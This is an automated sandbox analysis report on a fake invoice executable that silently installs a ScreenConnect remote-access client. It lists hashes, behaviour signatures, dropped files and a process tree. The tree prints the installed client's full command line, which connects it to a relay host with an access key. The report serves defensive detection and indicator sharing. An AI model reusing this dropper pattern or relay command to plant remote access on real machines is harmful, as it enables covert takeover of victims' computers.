Analysis

  • max time kernel
    96s
  • max time network
    136s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-02-2025 08:40

General

  • Target

    Invoice4231284.exe

  • Size

    5.4MB

  • MD5

    f223c16f11e3c4350f34d51d44498877

  • SHA1

    1dc62cdb40dabc991ad3ba4dea1a342e99fdb5a5

  • SHA256

    670be5276e9cfb8ac71c870902de0e55ca467c8fb3b7b7d993a91112557f9376

  • SHA512

    45c3fe528fc31f99ef200153058695ae2b8bf2ef5a4e7f040b984ae36e1acb8a070301d64061c9da49f753be601542e8ad41793220b5026755639ecacb2c8fe4

  • SSDEEP

    49152:xEEL5cx5xTkYJkGYYpT0+TFiH7efP8Q1yJJ4ZD1F5z97oL1YbGQ+okRPGHpRPqM8:GEs6efPNwJ4t1h0cG5FGJRPxow8O

Malware Config

Signatures

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 3 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Drops file in Program Files directory 16 IoCs
  • Drops file in Windows directory 13 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 22 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 37 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Invoice4231284.exe
    "C:\Users\Admin\AppData\Local\Temp\Invoice4231284.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1244
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e89d9b3b19f1f9d9\ScreenConnect.ClientSetup.msi"
      2⤵
      • Enumerates connected drives
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:3048
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Boot or Logon Autostart Execution: Authentication Package
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3984
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 16480C486396B1D238068E1A01E05003 C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4168
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIE242.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240640781 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:2908
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding A6FD041660315468CA6AAB883F4104CA
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:4824
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 0924E33D360EFC7C65F97FCB5F5BAD09 E Global\MSI0000
      2⤵
      • Drops file in Windows directory
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:3772
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
      PID:3644
    • C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\ScreenConnect.ClientService.exe
      "C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-mopgxp-relay.screenconnect.com&p=443&s=fda6155e-41c3-411e-8cec-941f8888225c&k=BgIAAACkAABSU0ExAAgAAAEAAQDxpGM0rTI0l8R0YLrTUzvMcrFQNqikChKeeFwAqXuisgso7fbvFB9droohm6UmQv424CATiaSN1Dt5a7kzqYdmjZ4VE89TMUaaWTKGqR%2f3mJaR3nx5CFRFBOcbC4aJ%2fYGQruf%2fG%2bwSiyyJUq81chi9Q%2bjeSddfXje0sdUcQjXy%2bwQ9pYBKEIBykIjdfke7XkghkNvuPAzOOFFT3Zw51dAeVb95GKEPqua3UVbsvJelXXUIjHU9JgO8mvqdK8BkIEpRk7Kw5rM%2b9U4lOr155WB1ziC%2fwZ8c7Nh9LiDyyrrXdxR%2b431d8YgPdkT8%2fWN%2bnHbTsnYgWJodyh8tx0u7qg6t&c=joemark%20llc&c=melnimer.com&c=melnimer&c=pc&c=&c=&c=&c="
      1⤵
      • Sets service image path in registry
      • Drops file in System32 directory
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3904
      • C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\ScreenConnect.WindowsClient.exe
        "C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\ScreenConnect.WindowsClient.exe" "RunRole" "9c091ec9-ac86-47ea-be87-f92cb6721e70" "User"
        2⤵
        • Executes dropped EXE
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:1936
      • C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\ScreenConnect.WindowsClient.exe
        "C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\ScreenConnect.WindowsClient.exe" "RunRole" "2b7830c1-5d51-4905-bbec-8c4ae3c697ae" "System"
        2⤵
        • Drops file in System32 directory
        • Executes dropped EXE
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        PID:3812

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Config.Msi\e57e86d.rbs

      Filesize

      214KB

      MD5

      20f1023b0b5f8ca8f4c0f2419bfcd7e8

      SHA1

      42d8ae7678e84cb3f3ced928e5554a077aa63687

      SHA256

      47659ba65900f64ce7825c938651b4cbd7aad096f19896744680263c8abbe760

      SHA512

      1032df88a097271a2ca9cde48cb8ca714900c3233f64019666d6a5be9b170bcb8decbd0d0b7df609b681857c5a7cf7a7461c7865e6e88a82996c0f7b4d07d84c

    • C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\Client.en-US.resources

      Filesize

      48KB

      MD5

      d524e8e6fd04b097f0401b2b668db303

      SHA1

      9486f89ce4968e03f6dcd082aa2e4c05aef46fcc

      SHA256

      07d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4

      SHA512

      e5bc6b876affeb252b198feb8d213359ed3247e32c1f4bfc2c5419085cf74fe7571a51cad4eaaab8a44f1421f7ca87af97c9b054bdb83f5a28fa9a880d4efde5

    • C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\Client.resources

      Filesize

      26KB

      MD5

      5cd580b22da0c33ec6730b10a6c74932

      SHA1

      0b6bded7936178d80841b289769c6ff0c8eead2d

      SHA256

      de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c

      SHA512

      c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787

    • C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\ScreenConnect.Client.dll

      Filesize

      192KB

      MD5

      3724f06f3422f4e42b41e23acb39b152

      SHA1

      1220987627782d3c3397d4abf01ac3777999e01c

      SHA256

      ea0a545f40ff491d02172228c1a39ae68344c4340a6094486a47be746952e64f

      SHA512

      509d9a32179a700ad76471b4cd094b8eb6d5d4ae7ad15b20fd76c482ed6d68f44693fc36bcb3999da9346ae9e43375cd8fe02b61edeabe4e78c4e2e44bf71d42

    • C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\ScreenConnect.ClientService.dll

      Filesize

      66KB

      MD5

      5db908c12d6e768081bced0e165e36f8

      SHA1

      f2d3160f15cfd0989091249a61132a369e44dea4

      SHA256

      fd5818dcdf5fc76316b8f7f96630ec66bb1cb5b5a8127cf300e5842f2c74ffca

      SHA512

      8400486cadb7c07c08338d8876bc14083b6f7de8a8237f4fe866f4659139acc0b587eb89289d281106e5baf70187b3b5e86502a2e340113258f03994d959328d

    • C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\ScreenConnect.ClientService.exe

      Filesize

      93KB

      MD5

      75b21d04c69128a7230a0998086b61aa

      SHA1

      244bd68a722cfe41d1f515f5e40c3742be2b3d1d

      SHA256

      f1b5c000794f046259121c63ed37f9eff0cfe1258588eca6fd85e16d3922767e

      SHA512

      8d51b2cd5f21c211eb8fea4b69dc9f91dffa7bb004d9780c701de35eac616e02ca30ef3882d73412f7eab1211c5aa908338f3fa10fdf05b110f62b8ecd9d24c2

    • C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\ScreenConnect.WindowsAuthenticationPackage.dll

      Filesize

      254KB

      MD5

      5adcb5ae1a1690be69fd22bdf3c2db60

      SHA1

      09a802b06a4387b0f13bf2cda84f53ca5bdc3785

      SHA256

      a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5

      SHA512

      812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73

    • C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\ScreenConnect.WindowsClient.exe

      Filesize

      588KB

      MD5

      1778204a8c3bc2b8e5e4194edbaf7135

      SHA1

      0203b65e92d2d1200dd695fe4c334955befbddd3

      SHA256

      600cf10e27311e60d32722654ef184c031a77b5ae1f8abae8891732710afee31

      SHA512

      a902080ff8ee0d9aeffa0b86e7980457a4e3705789529c82679766580df0dc17535d858fbe50731e00549932f6d49011868dee4181c6716c36379ad194b0ed69

    • C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\ScreenConnect.WindowsClient.exe.config

      Filesize

      266B

      MD5

      728175e20ffbceb46760bb5e1112f38b

      SHA1

      2421add1f3c9c5ed9c80b339881d08ab10b340e3

      SHA256

      87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077

      SHA512

      fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

    • C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\ScreenConnect.WindowsCredentialProvider.dll

      Filesize

      822KB

      MD5

      be74ab7a848a2450a06de33d3026f59e

      SHA1

      21568dcb44df019f9faf049d6676a829323c601e

      SHA256

      7a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d

      SHA512

      2643d649a642220ceee121038fe24ea0b86305ed8232a7e5440dffc78270e2bda578a619a76c5bb5a5a6fe3d9093e29817c5df6c5dd7a8fbc2832f87aa21f0cc

    • C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\system.config

      Filesize

      966B

      MD5

      4eabdff6f9541028a04c6545e3d5f5d1

      SHA1

      443355dfa6114888c33e58b1ff92514095fe2766

      SHA256

      bb73642dc1ca7f1597227b96694d444311f5c350afffa8d84d95737d2ea47297

      SHA512

      1ee61c91f69f84d098ea52cf10af1dedb4d7ca3adb4a8550188348862425bcb4e72f6f635429f1451c30573fca8c4199a049c74b70d0a1bb0a110aca8eab7895

    • C:\Users\Admin\AppData\Local\Temp\MSIE242.tmp

      Filesize

      1.0MB

      MD5

      8a8767f589ea2f2c7496b63d8ccc2552

      SHA1

      cc5de8dd18e7117d8f2520a51edb1d165cae64b0

      SHA256

      0918d8ab2237368a5cec8ce99261fb07a1a1beeda20464c0f91af0fe3349636b

      SHA512

      518231213ca955acdf37b4501fde9c5b15806d4fc166950eb8706e8d3943947cf85324faee806d7df828485597eceffcfa05ca1a5d8ab1bd51ed12df963a1fe4

    • C:\Users\Admin\AppData\Local\Temp\MSIE242.tmp-\Microsoft.Deployment.WindowsInstaller.dll

      Filesize

      172KB

      MD5

      5ef88919012e4a3d8a1e2955dc8c8d81

      SHA1

      c0cfb830b8f1d990e3836e0bcc786e7972c9ed62

      SHA256

      3e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d

      SHA512

      4544565b7d69761f9b4532cc85e7c654e591b2264eb8da28e60a058151030b53a99d1b2833f11bfc8acc837eecc44a7d0dbd8bc7af97fc0e0f4938c43f9c2684

    • C:\Users\Admin\AppData\Local\Temp\MSIE242.tmp-\ScreenConnect.Core.dll

      Filesize

      536KB

      MD5

      14e7489ffebbb5a2ea500f796d881ad9

      SHA1

      0323ee0e1faa4aa0e33fb6c6147290aa71637ebd

      SHA256

      a2e9752de49d18e885cbd61b29905983d44b4bc0379a244bfabdaa3188c01f0a

      SHA512

      2110113240b7d803d8271139e0a2439dbc86ae8719ecd8b132bbda2520f22dc3f169598c8e966ac9c0a40e617219cb8fe8aac674904f6a1ae92d4ac1e20627cd

    • C:\Users\Admin\AppData\Local\Temp\MSIE242.tmp-\ScreenConnect.InstallerActions.dll

      Filesize

      11KB

      MD5

      73a24164d8408254b77f3a2c57a22ab4

      SHA1

      ea0215721f66a93d67019d11c4e588a547cc2ad6

      SHA256

      d727a640723d192aa3ece213a173381682041cb28d8bd71781524dbae3ddbf62

      SHA512

      650d4320d9246aaecd596ac8b540bf7612ec7a8f60ecaa6e9c27b547b751386222ab926d0c915698d0bb20556475da507895981c072852804f0b42fdda02b844

    • C:\Users\Admin\AppData\Local\Temp\MSIE242.tmp-\ScreenConnect.Windows.dll

      Filesize

      1.6MB

      MD5

      9ad3964ba3ad24c42c567e47f88c82b2

      SHA1

      6b4b581fc4e3ecb91b24ec601daa0594106bcc5d

      SHA256

      84a09ed81afc5ff9a17f81763c044c82a2d9e26f852de528112153ee9ab041d0

      SHA512

      ce557a89c0fe6de59046116c1e262a36bbc3d561a91e44dcda022bef72cb75742c8b01bedcc5b9b999e07d8de1f94c665dd85d277e981b27b6bfebeaf9e58097

    • C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e89d9b3b19f1f9d9\ScreenConnect.ClientSetup.msi

      Filesize

      7.9MB

      MD5

      8e273d26a4e4445eed7eb547abc90fdf

      SHA1

      bae6d03e7ccb25727694f4e7fa881ca847d9ff9d

      SHA256

      fed2655cc2561d9a4eaaf273df7d4fa428b2078e5551b87ffc63fe3d65fb0962

      SHA512

      b4c3057446b00f5a27d02c0443695b66198d6aa1b510b488dca9df9e926ca7ad7af655d111b816608a6dc34072a12a0164708de2166f5d73a1648a0ee3db2a17

    • C:\Windows\Installer\MSIEA70.tmp

      Filesize

      202KB

      MD5

      ba84dd4e0c1408828ccc1de09f585eda

      SHA1

      e8e10065d479f8f591b9885ea8487bc673301298

      SHA256

      3cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852

      SHA512

      7a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290

    • memory/1244-6-0x0000000005310000-0x00000000054BA000-memory.dmp

      Filesize

      1.7MB

    • memory/1244-9-0x0000000074530000-0x0000000074CE0000-memory.dmp

      Filesize

      7.7MB

    • memory/1244-11-0x0000000074530000-0x0000000074CE0000-memory.dmp

      Filesize

      7.7MB

    • memory/1244-4-0x0000000005280000-0x000000000530C000-memory.dmp

      Filesize

      560KB

    • memory/1244-5-0x0000000005250000-0x0000000005272000-memory.dmp

      Filesize

      136KB

    • memory/1244-13-0x0000000074530000-0x0000000074CE0000-memory.dmp

      Filesize

      7.7MB

    • memory/1244-0-0x000000007453E000-0x000000007453F000-memory.dmp

      Filesize

      4KB

    • memory/1244-8-0x0000000074530000-0x0000000074CE0000-memory.dmp

      Filesize

      7.7MB

    • memory/1244-7-0x0000000005E20000-0x00000000063C4000-memory.dmp

      Filesize

      5.6MB

    • memory/1244-1-0x0000000001360000-0x0000000001368000-memory.dmp

      Filesize

      32KB

    • memory/1244-2-0x0000000005580000-0x0000000005870000-memory.dmp

      Filesize

      2.9MB

    • memory/1244-3-0x0000000074530000-0x0000000074CE0000-memory.dmp

      Filesize

      7.7MB

    • memory/1936-135-0x0000000002CE0000-0x0000000002D16000-memory.dmp

      Filesize

      216KB

    • memory/1936-134-0x00000000009A0000-0x0000000000A36000-memory.dmp

      Filesize

      600KB

    • memory/1936-142-0x000000001B830000-0x000000001B848000-memory.dmp

      Filesize

      96KB

    • memory/1936-141-0x0000000002B90000-0x0000000002BA8000-memory.dmp

      Filesize

      96KB

    • memory/1936-140-0x000000001BCB0000-0x000000001BE36000-memory.dmp

      Filesize

      1.5MB

    • memory/1936-139-0x000000001BB00000-0x000000001BCAA000-memory.dmp

      Filesize

      1.7MB

    • memory/1936-138-0x000000001B8C0000-0x000000001B94C000-memory.dmp

      Filesize

      560KB

    • memory/1936-143-0x000000001B850000-0x000000001B891000-memory.dmp

      Filesize

      260KB

    • memory/2908-33-0x00000000025F0000-0x000000000261E000-memory.dmp

      Filesize

      184KB

    • memory/2908-45-0x0000000004D00000-0x0000000004EAA000-memory.dmp

      Filesize

      1.7MB

    • memory/2908-41-0x0000000004AC0000-0x0000000004B4C000-memory.dmp

      Filesize

      560KB

    • memory/2908-37-0x0000000002630000-0x000000000263A000-memory.dmp

      Filesize

      40KB

    • memory/3812-145-0x000000001BB30000-0x000000001BC02000-memory.dmp

      Filesize

      840KB

    • memory/3904-123-0x0000000003FF0000-0x0000000004082000-memory.dmp

      Filesize

      584KB

    • memory/3904-125-0x0000000003D70000-0x0000000003DB1000-memory.dmp

      Filesize

      260KB

    • memory/3904-94-0x0000000003B00000-0x0000000003B18000-memory.dmp

      Filesize

      96KB

    • memory/3904-122-0x0000000003D30000-0x0000000003D66000-memory.dmp

      Filesize

      216KB

    • memory/3904-118-0x0000000003CE0000-0x0000000003D30000-memory.dmp

      Filesize

      320KB

    • memory/3904-127-0x00000000041D0000-0x00000000042A2000-memory.dmp

      Filesize

      840KB